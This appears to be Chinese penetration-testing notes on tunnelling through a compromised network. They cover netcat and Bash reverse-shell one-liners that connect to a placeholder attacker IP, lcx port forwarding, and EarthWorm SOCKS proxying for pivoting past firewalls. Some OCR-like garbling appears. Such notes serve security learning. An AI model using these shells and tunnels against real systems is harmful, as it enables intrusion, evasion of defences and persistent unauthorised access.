---
​---title:隧道技术
​---
---

# 隧道代理

攻击者通过边界主机进入内网，往往会利用它当跳板进行横向渗透，但现在的内部网络大多部署了很多安全设备网络结构错综复杂，对于某些系统的访问会受到各种阻挠，这就需要借助代理去突破这些限制，因此面对不同的网络环境对于代理的选择及使用显得格外重要

总之一句话: 

> **`因为复杂所以要挖隧道, 实现随便访问`**

ubuntu2  ubuntu  ubuntu





### 什么是反弹shell

反弹Sh川是指在攻击机监听某个端口，然后通过目标连接攻击机监听的端口，在攻击机反弹得到目标机的Sh‖。通常在目标网络有防火墙或其他因素限制，导致无法持续控制目标，或执行命令受阻等情况时需要进行反弹Shell

> 常见的反弹shell :  `Bash 反弹shell` , `NC 反弹shell` , `python反弹shell` 等.



### NC反弹

Netcat简称NC,是一个简单、可靠的网络工具，被誉为**网络界的瑞士军刀**。通NC可以进行端口扫描、反弹 Shel‖、端口监听和文件传输等操作，常用参数如下

| 参数命令 | 作用                                                        |
| -------- | ----------------------------------------------------------- |
| -c       | 指定连接后要执行的shell命令                                 |
| -e       | 指定连接后要执行的文件名                                    |
| -k       | 配置Socket一直存活(若不想退出Shell后监听断开, 可以用改参数) |
| -l       | 监听模式                                                    |
| -p       | 设置本地主机使用的通信端口                                  |
| -u       | 使用UDP传输协议, 默认为TCP                                  |
| -v       | 显示指令过程, 用  -wv   更详细                              |
|          |                                                             |



### 示例

> 准备两台机器, 一台攻击机, 一台靶机

1. 靶机的cmd 的中执行:

```
nc -lvvp 1111 -e /bin/bash
```

2. 在攻击机中执行(**nc.exe是已经准备好的文件**): 

```
nc.exe 靶机ip 1111
```



### Bash 反弹shell

> **Bash 是linux 默认的shell**

```
bash-i>&/dev/tcp/攻击机IP/攻击机端口0>&1 
bash-i>&/dev/tcp/攻击机IP/攻击机端口0>&2 
bash-i>&/dev/udp/攻击机IP/攻击机端口0>&1 
bash-i>&/dev/udp/攻击机IP/攻击机端口0>&2
```



### 端口转发

若攻克的边界主机可访问外网，则可以考虑使用端口转发进行内网穿透，端口转发就是将一个端口转发到另一个端口例如：由于配置了防火墙只允许wb访问，这个时候攻击者想访问3389端口，远程连接是不可以的，就需要使用进行端口转发

> 经典端口转发工具

**具体步骤**

1. 攻击者执行下方命令, 在目标ip的对应端口开放的情况下, 建立连接

```
Lcx -slave 攻击者ip 监听端口 目标ip 目标端口
```

2. 接着在攻击机上执下方命令, 使得攻击机监听的端口, 转发给 攻击机 另一端口

````
Lcx -listen 上方-slave对应的攻击机端口  攻击机上另一个端口
````



3. **正反向连接**

正向连接，反向连接的概念**取决于谁主动连接谁** , 例如：攻击者主动连接受害者，那就是正向连接受害者主动连接攻击者，那就是反向链接



4. **协议隧道**

当我们去搭建隧道的时候，通常使用不同的协议来跺避测，常见的有 **HTTP隧道**，**SOCKS隧道**，**DNS隧道**，**ICMP隧道**，**SSH隧道**等等

> 所谓的代理安全其实并不安全, 只是多设了几层跳板, 本质上是可追踪到的, 但是层数越多, 追踪起来越费劲, 成本越大, 所以`安全`(没人愿意费劲)



## 应用层代理

`隧道代理应要确保 中间电脑 与 靶机和攻击机 能ping通`

### Socks代理隧道

常见的代理工具有**`regeorg,FP,EW,NPS,Termite`**, 通过上述的代理，配合代理客户端实现内网漫游 EW全称叫做EarthWorm简称叫做EW,它是一套便携式的网络工具，具有**SOCKS5服务架设**和**端口转发**两大核心功能，并且**包含着LCX工具**的功能，可以再复杂的网络环境实现网络穿透 EW可以以正向和反省向以及多级级联的方式建立网络隧道



**工具连接 : **https://github.com/idlefire/ew

正向代理:

> eo_for_Win 假设是一个隧道工具
>
> 在**中间电脑(代理电脑)**上使用隧道工具,  使得黑客通过 1080 访问中间电脑

```
eo_for_Win.exe -s ssocksd -l 1080
```



2. 在攻击机上使用代理工具, 配置 ip 和 端口

> 使得 攻击机能连接上中间电脑(ip 和端口都是中间机的) , 并**开启代理工具的全局使得攻击机的 **所有的流量都走代理**

3. 在靶机上开启对应的端口

4. 攻击机连接靶机的端口

> **如果还想更深层的代理, 那就在配置一个中间机, 组成代理链**











